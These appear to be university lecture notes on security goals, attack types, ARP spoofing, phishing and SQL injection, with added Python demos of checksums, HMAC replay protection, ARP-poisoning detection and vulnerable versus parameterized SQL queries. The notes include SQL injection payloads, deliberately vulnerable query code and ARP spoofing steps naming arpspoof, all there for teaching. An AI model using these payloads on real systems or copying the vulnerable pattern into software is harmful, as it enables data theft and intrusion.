UNIT-1 Cns

The document provides an overview of Cryptography and Network Security, emphasizing the importance of protecting data during transmission through encryption and various security measures. It outlines key concepts such as confidentiality, integrity, and availability, along with tools and techniques for ensuring these security goals. Additionally, it discusses different types of cryptographic attacks and the Address Resolution Protocol (ARP) spoofing as a specific threat to network security.

Uploaded by Prithvi Madivada

Cryptography & Network Security Dept of CSE

Cryptography & Network Security

By P.V. VIJAYA DURGA, Dept of CSE

Vishnu Institute of Technology Mrs P. V. Vijaya Durga



UNIT-I Basic Principles: Security Goals, Cryptographic Attacks, Services and Mechanisms, Mathematics of Cryptography.

INTRODUCTION:

Computer data often travels from one computer to another, leaving the safety of its protected physical surroundings. Once the data is out of hand, people with bad intentions could read, modify or forge it, either for amusement or for their own benefit. Cryptography can reformat and transform our data, making it safer on its trip between computers. The technology is based on the essentials of secret codes, augmented by modern mathematics that protects our data in powerful ways.

• Computer Security: generic name for the collection of tools designed to protect data and to thwart hackers.

• Network Security: measures to protect data during their transmission.

• Internet Security: measures to protect data during their transmission over a collection of interconnected networks.

Cryptography: Cryptography ensures that information is sent safely and securely, preserving confidentiality, integrity and authenticity. The basic terms and the two modes of encryption are introduced first; the different types of attacks that are possible follow later in this unit.

The text that is to be transmitted, which can be commonly read, is known as 'plaintext'.

This plaintext is converted to an unreadable form by the process of encryption and is then known as 'ciphertext'.

This ciphertext can be transmitted over insecure channels: an eavesdropper who captures it learns nothing useful about the plaintext without the key. Note that encryption on its own hides content; it does not by itself stop the ciphertext from being captured, altered or replayed, which is why integrity and authentication mechanisms are also needed. Once it has been transmitted, it is decrypted at the receiver's end and the 'plaintext' is recovered.


An algorithm is the mathematical procedure that encrypts and decrypts the information; it is driven by a "key".

The "key" is a long sequence of bits which is used to encrypt and decrypt the text. In a well-designed system the algorithm is public and only the key is secret.

This is the basic and fundamental concept behind cryptography. There are two modes of encryption: symmetric encryption and asymmetric encryption.
In 'Symmetric encryption' algorithms, the same key which is used to encrypt is used to decrypt a message.
In 'Asymmetric encryption' algorithms, different keys are used to encrypt and


Security Goals:

The objective of cyber security is to protect information from being stolen, compromised or attacked. Every security measure can be related to at least one of three goals:

• Confidentiality

• Integrity

• Availability

These three pillars of network security are often represented as the CIA triangle (the CIA triad).

1. Confidentiality:

The first goal of network security is "Confidentiality". The function of "Confidentiality" is protecting valuable business data (in storage or in motion) from unauthorized persons. The confidentiality part of network security makes sure that the data is available ONLY to intended and authorized persons. Access to business data should be limited to those individuals who are permitted to use that data.


Tools for Confidentiality:

Encryption: It is a method of transforming information to make it unreadable for unauthorized users by using an algorithm. The transformation of data uses a secret key (an encryption key) so that the transformed data can only be read by using the matching decryption key (the same key in symmetric encryption, the paired private key in asymmetric encryption). It protects sensitive data such as credit card numbers by transforming it into unreadable ciphertext. This encrypted data can only be read by decrypting it. Asymmetric-key and symmetric-key are the two primary types of encryption.

Access control: It defines rules and policies for limiting access to a system or to physical or virtual resources. It is a process by which users are granted access and certain privileges to systems, resources or information. In access control systems, users need to present an identity (such as a user name or a computer's serial number) and prove it with credentials before they can be granted access.

Authentication: It is a process that ensures and confirms a user's identity or the role that someone has. It can be done in a number of different ways, but it is usually based on a combination of: something the person has (like a smart card or a hardware token that stores secret keys), something the person knows (like a password), and something the person is (like a fingerprint).

Authentication is a necessity for every organization because it enables organizations to keep their networks secure by permitting only authenticated users to access their protected resources. These resources may include computer systems, networks, databases, websites and other network-based applications or services.

Authorization: It is a security mechanism which gives permission to do or have something. It is used to determine whether a person or system is allowed access to resources, based on an access control policy, including computer programs, files, services, data and application features. It is normally preceded by authentication for user identity verification. System administrators are typically assigned permission levels covering all system and user resources. During authorization, a system checks an authenticated user's access rules and either grants or refuses resource access.

Physical security: It describes measures designed to deny unauthorized access to IT assets like facilities, equipment, personnel, resources and other property, and to protect them from damage. It protects these assets from physical threats including theft, vandalism, fire and natural disasters.

2. Integrity

The second goal of network security is "Integrity". Integrity aims at maintaining and assuring the accuracy and consistency of data. The function of integrity is to make sure that the data is accurate and reliable and is not changed by unauthorized persons or hackers. The data received by the recipient must be exactly the same as the data sent by the sender, without a change in even a single bit.


Tools for Integrity:

Backup: It is the periodic archiving of data. It is a process of making copies of data or data files to use in the event that the original data or data files are lost or destroyed. It is also used to make copies for historical purposes, such as for longitudinal studies, statistics or historical records, or to meet the requirements of a data retention policy. Many applications, especially in a Windows environment, produce backup files using the .BAK file extension.

Checksum: It is a numerical value used to verify the integrity of a file or a data transfer. In other words, it is the computation of a function that maps the contents of a file to a numerical value. Checksums are typically used to compare two sets of data to make sure that they are the same. A checksum function depends on the entire contents of a file and is designed so that even a small change to the input (such as flipping a single bit) is very likely to produce a different output value. Simple checksums such as CRC only detect accidental corruption: an attacker who can change the file can recompute them. To detect deliberate modification, a cryptographic hash (for example SHA-256) must be used, and the hash value itself must be protected from tampering, for example by storing it separately, signing it, or using a keyed MAC.
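The following Python example is added here and is not part of the original notes. It shows a SHA-256 checksum detecting a single flipped bit in a constructed sample "file", and compares the digests in constant time. The function names and the sample content are my own.

```python
import hashlib
import hmac


def checksum(data: bytes) -> str:
    """SHA-256 digest of *data* as a hex string.

    A cryptographic hash is used rather than a CRC: a CRC only catches
    accidental corruption, while SHA-256 makes it infeasible for an attacker
    to craft a different file with the same digest.
    """
    return hashlib.sha256(data).hexdigest()


def flip_bit(data: bytes, bit_index: int) -> bytes:
    """Return a copy of *data* with exactly one bit toggled.

    Models the "change in even a single bit" the notes talk about, whether
    caused by a transmission error or by an attacker.
    """
    buf = bytearray(data)
    buf[bit_index // 8] ^= 1 << (bit_index % 8)
    return bytes(buf)


def verify(data: bytes, expected_digest: str) -> bool:
    """Recompute the checksum and compare it with the published one.

    hmac.compare_digest runs in constant time, so an attacker cannot learn
    how many leading characters of the digest matched from the timing.
    """
    return hmac.compare_digest(checksum(data), expected_digest)


# Constructed sample "file" (not from the notes). The trusted digest would
# normally arrive over a separate channel, e.g. a signed release manifest.
ORIGINAL = b"Allow JOHN to read confidential file X\n"
ORIGINAL_DIGEST = checksum(ORIGINAL)

if __name__ == "__main__":
    received = flip_bit(ORIGINAL, 37)  # one bit corrupted in transit
    print("unchanged file verifies:", verify(ORIGINAL, ORIGINAL_DIGEST))
    print("one-bit change verifies:", verify(received, ORIGINAL_DIGEST))
    print("original digest:", ORIGINAL_DIGEST)
    print("altered digest: ", checksum(received))
```

The check is only as good as the channel the digest came over: if an attacker can replace the file and the published digest together, a plain hash detects nothing, which is why signed manifests or keyed MACs are used for data that crosses untrusted networks.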

Error Correcting Codes: It is a method for storing or transmitting data in such a way that small changes (e.g. a few flipped bits) can be detected and automatically corrected. Like checksums, they protect against accidental errors, not against a deliberate attacker.


3. Availability
Availability is the property in which information is accessible and modifiable in a timely fashion by those authorized to do so. It is the guarantee of reliable and constant access to our sensitive data by authorized people.

Tools for Availability:

Physical Protections

Computational Redundancies

Physical Protections:
Physical safeguards keep information available even in the event of physical challenges. They ensure that sensitive information and critical information technology are housed in secure areas.

Computational redundancies:
Redundancy is applied as fault tolerance against accidental faults. It provides spare computers and storage devices that serve as fallbacks in the case of failures.

Cryptographic Attacks:

The basic intention of an attacker is to break a cryptosystem and to find the plaintext from the ciphertext. Because the algorithm is assumed to be public (Kerckhoffs's principle), the attacker only needs to find the secret decryption key to recover the plaintext; the security of the system rests entirely on the key.


Security attacks:

I) Based on information:

There are different types of security attacks which affect the communication process in the network, and they are as follows.

Interruption: This type of attack is due to an obstruction of any kind during the communication process between one or more systems. The attacked systems become unusable for their legitimate users. It is an attack on availability.

Examples: Overloading a server host so that it cannot respond, cutting a communication line.

Interception: Confidentiality is what this type of attack violates. The data or message which is sent by the sender is intercepted by an unauthorized individual, who can read it, copy it or use it for malicious purposes. So the confidentiality of the message is lost in this type of attack.

Examples: Wiretapping telecommunications networks, illicit copying of files or programs.

Modification: As the name indicates, the message which is sent by the sender is modified by an unauthorized user and then sent on to the destination. The integrity of the message is lost by this type of attack: the receiver does not receive the exact message which was sent by the source.

Examples: Modifying the contents of messages in the network, changing information stored in data files.

Fabrication: In this type of attack a fake message is inserted into the network by an unauthorized user as if it came from a valid user. It is an attack on authenticity, and it can also undermine the integrity of the data the receiver holds.

Examples: Inserting messages into the network using the identity of another individual, replaying previously intercepted messages, spoofing a web site or other network service.

II) Based on the action performed by the attacker

Attacks are typically categorized based on the action performed by the attacker. An attack, thus, can be passive or active.

Active attacks: An active attack attempts to alter system resources or affect their operation. Active attacks involve some modification of the data stream or the creation of a false stream. Types of active attacks are as follows:

i) Masquerade
A masquerade attack takes place when one entity pretends to be a different entity. A masquerade attack usually includes one of the other forms of active attack (for example, a captured authentication exchange is replayed so that the attacker obtains another entity's privileges).


ii) Modification of Messages
It means that some portion of a legitimate message is altered, or that messages are delayed or reordered, to produce an unauthorized effect. For example, a message meaning "Allow JOHN to read confidential file X" is modified to "Allow Smith to read confidential file X".


iii) Repudiation
This attack is done by either the sender or the receiver. The sender or receiver can later deny that he/she sent or received a message. For example, a customer asks his bank "to transfer an amount to someone" and later the sender (customer) denies that he made such a request. This is repudiation.


iv) Replay
It involves the passive capture of a message and its subsequent retransmission to produce an unauthorized effect (for example, a captured "transfer funds" request is re-sent so that the transfer happens twice).

v) Denial of Service
It prevents the normal use of communication facilities. This attack may have a specific target. For example, an entity may suppress all messages directed to a particular destination. Another form of service denial is the disruption of an entire network, either by disabling the network or by overloading it with messages so as to degrade performance.
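The following Python example is added here and is not part of the original notes. It shows how a receiver blocks three of the active attacks above with one mechanism: an HMAC-SHA256 tag over each message defeats masquerade (the attacker has no key) and modification (the tag no longer matches), and a random nonce plus a freshness window defeats replay. The shared key, the message fields and the sample messages are constructed for the example.

```python
import hashlib
import hmac
import json
import secrets

# Hypothetical shared secret between sender and receiver (constructed for the
# example; a real key comes from a key exchange or a key management system).
SHARED_KEY = b"example-shared-key-do-not-reuse"


def _canonical(msg: dict) -> bytes:
    """Serialize the authenticated fields deterministically so that sender and
    receiver compute the MAC over exactly the same bytes."""
    fields = {k: msg[k] for k in ("from", "body", "nonce", "ts")}
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


def make_message(key: bytes, sender: str, body: str, ts: int) -> dict:
    """Build a message carrying a fresh random nonce and an HMAC-SHA256 tag.

    Only a party holding *key* can produce a valid tag.
    """
    msg = {"from": sender, "body": body, "nonce": secrets.token_hex(16), "ts": ts}
    msg["tag"] = hmac.new(key, _canonical(msg), hashlib.sha256).hexdigest()
    return msg


class Receiver:
    """Verifies tag, freshness and nonce uniqueness before accepting a message."""

    def __init__(self, key: bytes, window_seconds: int = 300):
        self.key = key
        self.window = window_seconds
        self.seen_nonces = {}  # nonce -> timestamp, kept only inside the window

    def accept(self, msg: dict, now: int) -> str:
        """Return 'accept', or a reason code naming the attack that was blocked."""
        try:
            expected = hmac.new(self.key, _canonical(msg), hashlib.sha256).hexdigest()
        except (KeyError, TypeError):
            return "bad-tag"  # required fields missing: cannot be authentic
        if not hmac.compare_digest(expected, str(msg.get("tag", ""))):
            return "bad-tag"  # masquerade (wrong key) or modification
        if abs(now - msg["ts"]) > self.window:
            return "stale"  # replayed after the window (or bad clock)
        if msg["nonce"] in self.seen_nonces:
            return "replay"  # identical message already accepted in the window
        self.seen_nonces[msg["nonce"]] = msg["ts"]
        # Drop nonces that can no longer pass the freshness check, so the
        # replay cache stays bounded.
        self.seen_nonces = {n: t for n, t in self.seen_nonces.items()
                            if now - t <= self.window}
        return "accept"


if __name__ == "__main__":
    rx = Receiver(SHARED_KEY)
    legit = make_message(SHARED_KEY, "customer", "transfer 100 to Smith", ts=1000)
    print("genuine:    ", rx.accept(legit, now=1000))
    print("replayed:   ", rx.accept(legit, now=1010))
    print("modified:   ", rx.accept(dict(legit, body="transfer 100 to Mallory"), now=1000))
    forged = make_message(b"wrong-key", "customer", "transfer 100 to Mallory", ts=1000)
    print("masqueraded:", rx.accept(forged, now=1000))
    late = make_message(SHARED_KEY, "customer", "transfer 100 to Smith", ts=1000)
    print("stale:      ", rx.accept(late, now=5000))
```

An HMAC does not address repudiation: both parties hold the same key, so either could have produced the tag. Non-repudiation needs a digital signature made with the sender's private key, which only the sender holds.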


Passive attacks: A passive attack attempts to learn or make use of information from the system but does not affect system resources. Passive attacks are in the nature of eavesdropping on or monitoring of transmissions. The goal of the opponent is to obtain the information that is being transmitted. Types of passive attacks are as follows:

1. The release of message contents:

A telephone conversation, an electronic mail message or a transferred file may contain sensitive or confidential information. We would like to prevent an opponent from learning the contents of these transmissions.

2. Traffic analysis:
Suppose that we had a way of masking (encrypting) the information, so that the attacker, even after capturing the message, could not extract any information from its contents.

The opponent could still determine the location and identity of the communicating hosts and could observe the frequency and length of the messages being exchanged. This information might be useful in guessing the nature of the communication that was taking place. Passive attacks are hard to detect because they do not alter the data; the emphasis is therefore on prevention (encryption) rather than detection.


ARP ATTACK:

Address Resolution Protocol (ARP):

Address Resolution Protocol (ARP) spoofing, or ARP poisoning, is a form of spoofing attack that hackers use to intercept data. A hacker commits an ARP spoofing attack by tricking one device into sending messages to the hacker instead of the intended recipient. This way, the hacker gains access to the device's communications, including sensitive data such as passwords and credit card information wherever those are sent unencrypted.

The ARP Protocol and ARP Spoofing:

ARP spoofing occurs on a local area network (LAN) and abuses ARP itself. ARP is the protocol that maps a (typically dynamically assigned) Internet Protocol (IP) address to a physical machine address, referred to as a media access control (MAC) address. Every IPv4 frame delivered on the LAN relies on this mapping.

Each network device has both an IP address and a MAC address. To send and receive messages, hosts on a network must know the MAC addresses of the others on that network. To do so, a host resolves the (typically dynamic) IP address of a peer to that peer's MAC address.

For example, Host A wants to learn the MAC address that belongs to Host B's IP address. It therefore broadcasts an ARP request to all the other hosts on the LAN. Following this request, it receives an ARP reply from Host B containing B's MAC address. The requesting host then stores this mapping in its ARP cache, which is similar to a contacts list. This cache is sometimes referred to as an ARP table, as the addresses are stored in the form of a table. ARP has no authentication: any host on the LAN can send a reply, and most hosts will update their cache even for replies they never asked for.

ARP spoofing refers to an attacker with access to the LAN pretending to be Host B. The attacker sends forged ARP replies to Host A with the goal of tricking Host A into saving the attacker's MAC address as Host B's address. Host A will then send communications intended for Host B to the attacker instead. Once the attacker becomes this man in the middle, each time Host A communicates with Host B it is in fact communicating first with the attacker. Host B will typically be the default gateway, i.e. the router.

What is ARP Spoofing (ARP Poisoning)

ARP spoofing, also known as ARP poisoning, is a Man in the Middle (MitM) attack that allows attackers to intercept communication between network devices. The attack works as follows:

1. The attacker must have access to the network. They scan the network to determine the IP addresses of at least two devices, say a workstation and a router.
2. The attacker uses a spoofing tool, such as arpspoof, to send out forged ARP replies. (Driftnet, often mentioned alongside it, only extracts images from the redirected traffic; it does not forge ARP.)
3. The forged replies advertise that the correct MAC address for both IP addresses, belonging to the router and the workstation, is the attacker's MAC address. This fools both the router and the workstation into sending to the attacker's machine instead of to each other.
4. The two devices update their ARP cache entries and from that point onwards communicate with the attacker instead of directly with each other.
5. The attacker is now secretly in the middle of all communications, and forwards the traffic on (with IP forwarding enabled on the attacking machine) so that the victims notice nothing.


Types of ARP Spoofing:

• Man-in-the-Middle: In the man-in-the-middle attack, hackers use ARP spoofing to intercept communications that occur between devices on a network and steal the information transmitted between them. Sometimes hackers also use the man-in-the-middle position to modify traffic between network devices.
• Session hijacking: With the help of ARP spoofing, hackers can read session identifiers (for example cookies sent over unencrypted HTTP) from the intercepted traffic and use them to gain unauthorized access to the victim's private systems and data.
• Denial-of-service attacks: A denial-of-service attack is one in which one or more victims are denied access to the network. With the help of ARP spoofing, a single target victim's MAC address is linked to multiple IP addresses (for instance the gateway's). All traffic for those addresses is then shifted toward the target victim's MAC address, overloading the victim and cutting the other hosts off from their real destination.

How to Detect an ARP Cache Poisoning Attack:

Here is a simple way to detect that a specific device's ARP cache has been poisoned, using the command line. Start an operating system shell (administrator rights are not needed just to read the table). Display the ARP table with the following command, which exists on Windows and, where the net-tools package is installed, on Linux (on modern Linux distributions "ip neigh" shows the same information in a different layout):

arp -a

On Windows the output will look something like this:

Internet Address      Physical Address
192.168.5.1           00-14-22-01-23-45
192.168.5.201         40-d4-48-cr-55-b8
192.168.5.202         00-14-22-01-23-45

If the table contains two different IP addresses that have the same MAC address, this is a strong indication that an ARP attack is taking place. Because the IP address 192.168.5.1 can be recognized as the router, the attacker's IP is probably 192.168.5.202. Confirm before acting: a gateway can legitimately answer for more than one IP address (secondary addresses, or a virtual router address shared by redundant gateways), so compare the MAC with the one the router itself reports, or with the switch's MAC address table.
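The following Python example is added here and is not part of the original notes. It automates the check just described: it parses ARP table text in the Windows "arp -a" layout and in the Linux "ip neigh" layout, and reports any MAC address that is claimed by more than one dynamic entry, naming the non-gateway IP as the suspect. The two sample tables are constructed for the example (the MAC addresses are made up and differ from the table in the notes); the function names are my own.

```python
import re
from collections import defaultdict
from typing import Optional

# Constructed sample in the Windows "arp -a" layout: 192.168.5.1 is the
# gateway, and a second host is advertising the gateway's MAC address.
WINDOWS_ARP_A = """\
Interface: 192.168.5.50 --- 0xb
  Internet Address      Physical Address      Type
  192.168.5.1           00-14-22-01-23-45     dynamic
  192.168.5.201         40-d4-48-0c-55-b8     dynamic
  192.168.5.202         00-14-22-01-23-45     dynamic
  192.168.5.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed sample in the Linux "ip neigh" layout, with no poisoning.
LINUX_IP_NEIGH = """\
192.168.5.1 dev eth0 lladdr 00:14:22:01:23:45 REACHABLE
192.168.5.201 dev eth0 lladdr 40:d4:48:0c:55:b8 STALE
"""

_WIN_RE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)",
    re.M)
_LINUX_RE = re.compile(
    r"^(\d{1,3}(?:\.\d{1,3}){3}) dev \S+ lladdr ([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5}) (\w+)",
    re.M)


def parse_arp_table(text: str) -> list:
    """Return (ip, mac, kind) triples from Windows arp -a or Linux ip neigh text.

    MACs are normalised to lowercase, dash-separated, so both layouts compare equal.
    """
    entries = _WIN_RE.findall(text) or _LINUX_RE.findall(text)
    return [(ip, mac.lower().replace(":", "-"), kind.lower()) for ip, mac, kind in entries]


def find_duplicate_macs(entries, gateway_ip: Optional[str] = None) -> dict:
    """Group dynamic entries by MAC and report MACs claimed by more than one IP.

    Static/permanent entries, the broadcast address and IPv4 multicast MACs are
    skipped: they are expected to repeat and are not evidence of poisoning.
    """
    by_mac = defaultdict(list)
    for ip, mac, kind in entries:
        if kind in ("static", "permanent"):
            continue
        if mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e"):
            continue
        by_mac[mac].append(ip)
    alerts = {}
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            # If the gateway is known, the other IP(s) are the likely attacker.
            suspects = [ip for ip in ips if ip != gateway_ip]
            alerts[mac] = {"ips": ips, "suspects": suspects}
    return alerts


if __name__ == "__main__":
    for name, text in (("windows", WINDOWS_ARP_A), ("linux", LINUX_IP_NEIGH)):
        found = find_duplicate_macs(parse_arp_table(text), gateway_ip="192.168.5.1")
        print(name, "->", found or "no duplicate MAC addresses")
```

A hit from this script is a lead, not proof: the same legitimate exceptions as above apply (secondary gateway addresses, redundant routers sharing a virtual MAC), so confirm on the switch or with a packet capture before blocking a host.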

To discover ARP spoofing in a large network and get more information about the type of communication the attacker is carrying out, you can use the open source Wireshark protocol analyzer; its ARP dissector raises a "duplicate IP address" warning when two MAC addresses claim the same IP address.

ARP Spoofing Prevention:

Here are a few best practices that can help you prevent ARP spoofing on your network:

• Use a Virtual Private Network (VPN): a VPN lets devices reach the Internet through an encrypted tunnel. An attacker who redirects the traffic with ARP spoofing then sees only ciphertext. Note that the VPN does not stop the poisoning itself (the attacker can still drop the traffic); it only removes the value of intercepting it. End-to-end encryption such as HTTPS has the same effect for individual services.
• Use static ARP: the ARP implementation lets you define a static ARP entry for an IP address; a static entry is not overwritten by ARP replies for that address. For example, if a workstation always connects to the same router, you can define a static ARP entry for that router, preventing the attack against that mapping. This does not scale to many hosts and must be maintained when hardware changes.
• Use packet filtering: packet filtering solutions can identify poisoned ARP packets by seeing that they contain conflicting source information and stop them before they reach devices on your network. On managed switches this is done with Dynamic ARP Inspection, which validates ARP packets against the DHCP snooping binding table.
• Run a spoofing attack: check whether your existing defenses are working by mounting a spoofing attack, in coordination with IT and security teams. If the attack succeeds, identify weak points in your defensive measures and remediate them.

Phishing Attack:

Phishing attacks are the practice of sending fraudulent communications that appear to come from a reputable source. It is usually done through email. The goal is to steal sensitive data like credit card and login information, or to install malware on the victim's machine.
In a typical phishing scam, a hacker pretends to be someone the victim trusts, like a colleague, boss, authority figure or representative of a well-known brand. The hacker sends a message directing the victim to pay an invoice, open an attachment, click a link or take some other action.
Because they trust the supposed source of the message, the user follows the instructions and falls right into the scammer's trap. That "invoice" might send money directly to a hacker's account. That attachment might install ransomware on the user's device. That link might take the user to a website that steals credit card numbers, bank account numbers, login credentials or other personal data.

Phishing attack examples

The following illustrates a common phishing scam attempt:

• A spoofed email ostensibly from myuniversity.edu is mass-distributed to as many faculty members as possible.
• The email claims that the user's password is about to expire. Instructions are given to go to myuniversity.edu/renewal to renew their password within 24 hours.

Several things can occur by clicking the link. For example:

• The user is redirected to myuniversity.edurenewal.com, a bogus page appearing exactly like the real renewal page, where both new and existing passwords are requested. The attacker, monitoring the page, captures the current password and uses it to gain access to secured areas on the university network.
• The user is sent to the actual password renewal page, but the link carries a script payload that the real page reflects back into the browser (a reflected XSS attack). While the user is being redirected, the script runs in the background and steals the user's session cookie, giving the perpetrator the user's access to the university network.

Different Types of Phishing Attacks:

1. Spear phishing:

Spear phishing involves targeting a specific individual in an organization to try to steal their login credentials. The attacker often first gathers information about the person before starting the attack, such as their name, position and contact details, so that the message looks legitimate.

2. Vishing:

Vishing, which is short for "voice phishing", is when someone uses the phone to try to steal information. The attacker may pretend to be a trusted friend or relative, or to represent a trusted organization such as a bank or a government office.

3. Email phishing
In an email phishing scam, the attacker sends an email that looks legitimate, designed to trick the recipient into entering information in a reply or on a site that the hacker can use to steal or sell their data.

4. HTTPS phishing
An HTTPS phishing attack is carried out by sending the victim an email with a link to a fake website that is served over HTTPS, so that the browser's padlock icon lends the site credibility. The site may then be used to fool the victim into entering their private information. A padlock only means the connection is encrypted; it says nothing about who runs the site.

5. Pharming
In a pharming attack, the victim gets malicious code installed on their computer (or the DNS resolution they rely on is poisoned). This then sends the victim to a fake website designed to gather their login credentials, even though the victim typed the correct address.

6. Whaling
A whaling attack is a phishing attack that targets a senior executive (e.g. the CEO). These individuals often have deep access to sensitive areas of the network, so a successful attack can result in access to valuable information.

7. Man-in-the-middle (MitM) attacks

With a man-in-the-middle attack, the hacker gets in "the middle" of two parties and tries to steal information exchanged between them, such as account credentials. In its phishing form, the fake page relays the victim's input to the real login site in real time, so even one-time codes can be captured and used before they expire.


How to prevent phishing attacks:

• Evaluate emails for suspicious elements. Email headers may reveal deceptively-worded sender names or email addresses, while the body may include attachments and links that camouflage malicious code. Users should err on the side of caution when opening a message from an unfamiliar sender.

• Do not share personal information. Even when communicating with a trusted individual, personal information (e.g. Social Security numbers, bank information, passwords, etc.) should never be exchanged in the body of an email.

• Block spam. Most email clients come with built-in spam filters, but third-party filtering services can give users more granular control over their email. Other recommendations for avoiding email spam include unsubscribing from mailing lists, refusing to open spam emails, and keeping email addresses private (i.e. not listing them on an organization's external-facing website).

• Use email security protocols. Email authentication methods like SPF, DKIM, and DMARC records help verify the source of an email. Domain owners can configure these records to make it difficult for attackers to impersonate their domains in a domain spoofing attack.

• Run a browser isolation service. Browser isolation services isolate and execute browser code in the cloud, protecting users from triggering malware attachments and links that may be delivered through a web-based email client.

• Filter harmful traffic with a secure web gateway. A secure web gateway (SWG) inspects data and network traffic for known malware, then blocks incoming requests according to predetermined security policies.

SQL Injection:

What is SQL Injection?

• SQLi or SQL Injection is a web application vulnerability that lets an attacker run queries of their own choosing against the application's database.
• Attackers take advantage of the vulnerability by injecting SQL syntax through user input that the application concatenates into a query.
• Attackers can use SQL statements like SELECT to retrieve confidential information which otherwise would not be visible.
• SQL injection can also let the attacker perform a denial-of-service (DoS) attack, for example by injecting expensive queries that overload the database server or by deleting data.

What is the impact of a successful SQL injection attack?

• A successful SQL injection attack can have severe consequences, including unauthorized access to sensitive data such as personal information and financial records.
• Attackers may manipulate or delete critical data, compromising its integrity and causing operational disruptions.
• They can also bypass authentication mechanisms, gaining unauthorized access to user accounts, including administrative privileges.
• This can lead to the exposure of confidential information, identity theft, and significant financial losses.
• Additionally, SQL injection attacks can result in service downtime and damage to the organization's reputation.

How to Detect SQL injection Vulnerabilities?

• To detect SQL injection vulnerabilities, you can start by performing input validation testing, where special characters like ' or " are inserted into inputs to see if they cause errors or change the application's behaviour.
• Automated tools like sqlmap or Burp Suite can scan for vulnerabilities by simulating attacks.
• Reviewing the source code helps identify insecure practices, such as building dynamic SQL queries by string concatenation instead of using parameterized queries.
• Monitoring for unexpected database error messages can reveal potential issues.
• Finally, conducting thorough penetration testing, including both black-box and white-box methods, provides a comprehensive assessment of security weaknesses.
Use of SQL Injection in Web Applications

• Web servers communicate with database servers any time they need to retrieve or store user data.
• The attacker's SQL is crafted so that it is executed by the database when the application sends the query it has built from the user's input.

1. SQL in Web Pages

• SQL injection typically occurs when you ask a user for input, such as their username/user ID, and instead of a name/ID the user supplies SQL syntax that is executed by your database without your knowledge. For example:

txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;

The above code constructs an SQL query by directly concatenating user input (txtUserId) into the query string. Attackers can exploit this by supplying input containing a condition that is always true, like x=x or 1=1.
If the attacker gives the input "105 OR 1=1" in the UserId field, the resulting SQL will be:

SELECT * FROM Users WHERE UserId = 105 OR 1=1;

This query returns the data of all users, not just the user with UserId = 105.
Example of SQL Injection

For a better understanding of how attackers carry out a SQL injection attack, let us walk through a basic one ourselves and learn the process behind it.
Suppose we have an application based on student records. Any student can view only his or her own records by entering a unique and private student ID.
Suppose we have a field like the one below:

Student id: The student enters the following in the input field: 12222345 or 1=1.

Query:

SELECT * FROM STUDENT WHERE STUDENT_ID = 12222345 OR 1 = 1

SQL injection based on 1=1 works because 1=1 is always true. As you can see in the above example, the WHERE clause holds for every row, so all records are returned and all the student data is compromised. The malicious user can similarly use other SQL queries.
Consider the following SQL query.

Query 1:

SELECT * FROM USER WHERE USERNAME = '' AND PASSWORD = ''

Now a malicious attacker can use the '=' operator cleverly to retrieve private and secure user information. The following query, when executed, retrieves protected data not intended to be shown to users.

Query 2:

SELECT * FROM USER WHERE (USERNAME = '' OR 1=1) AND (PASSWORD = '' OR 1=1)

Since 1=1 always holds true, the WHERE clause matches every row and user data is compromised. The same effect is reached in practice by typing ' OR '1'='1 into both the username and password fields, which closes the application's own quotes and appends the always-true condition.
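The following Python example is added here and is not part of the original notes. It reproduces the two injections above against a real (in-memory SQLite) Users table and places the vulnerable, string-concatenating queries next to the parameterized versions that the prevention section calls for. The table, its rows and the function names are constructed for the example.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory Users table with constructed rows (not data from the notes).

    Passwords are stored in clear here only to keep the injection visible; a
    real application stores salted password hashes.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserId INTEGER PRIMARY KEY, Username TEXT, Password TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [(105, "john", "s3cret"), (106, "smith", "hunter2"), (107, "admin", "adm1n!")],
    )
    return conn


def get_user_vulnerable(conn, user_id_input: str) -> list:
    """The notes' pattern: user input concatenated straight into the SQL text."""
    sql = "SELECT UserId, Username FROM Users WHERE UserId = " + user_id_input
    return conn.execute(sql).fetchall()


def get_user_safe(conn, user_id_input: str) -> list:
    """Validate the type, then bind the value as a parameter: the input can
    only ever be a number, never SQL syntax."""
    try:
        user_id = int(user_id_input)
    except ValueError:
        return []  # "105 OR 1=1" is not an integer: rejected before any query
    return conn.execute(
        "SELECT UserId, Username FROM Users WHERE UserId = ?", (user_id,)
    ).fetchall()


def login_vulnerable(conn, username: str, password: str) -> list:
    """Query 1 from the notes built by concatenation; a quote in the input
    closes the string literal and the rest is parsed as SQL."""
    sql = ("SELECT Username FROM Users WHERE Username = '" + username
           + "' AND Password = '" + password + "'")
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password: str) -> list:
    """Same query with bound parameters; the driver sends the values separately
    from the SQL, so quotes and OR 1=1 are just characters in a string."""
    return conn.execute(
        "SELECT Username FROM Users WHERE Username = ? AND Password = ?",
        (username, password),
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("normal lookup      :", get_user_vulnerable(db, "105"))
    print("injected lookup    :", get_user_vulnerable(db, "105 OR 1=1"))
    print("parameterised      :", get_user_safe(db, "105 OR 1=1"))
    payload = "' OR '1'='1"
    print("injected login     :", login_vulnerable(db, payload, payload))
    print("parameterised login:", login_safe(db, payload, payload))
```

The injected login works because SQL evaluates AND before OR, so Username = '' OR '1'='1' AND Password = '' OR '1'='1' is true for every row. The parameterized version returns nothing for the same input: there is no user literally named ' OR '1'='1.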
SQL Injection Types

There are different types of SQL injection attacks:

1. In-band SQL Injection
• The attacker sends the malicious SQL and receives the result through the same channel, the web application's interface (the error-based technique below, and UNION-based extraction, are in-band).
• It allows attackers to extract sensitive information or modify the database itself.

2. Error-based SQL Injection
• Attackers exploit error messages generated by the database and displayed by the web application; the error text leaks table names, column names or data, which the attacker uses to gain access to confidential data or modify the database.

3. Blind SQL Injection
• Attackers send malicious SQL queries and observe only the application's response, which contains no database output.
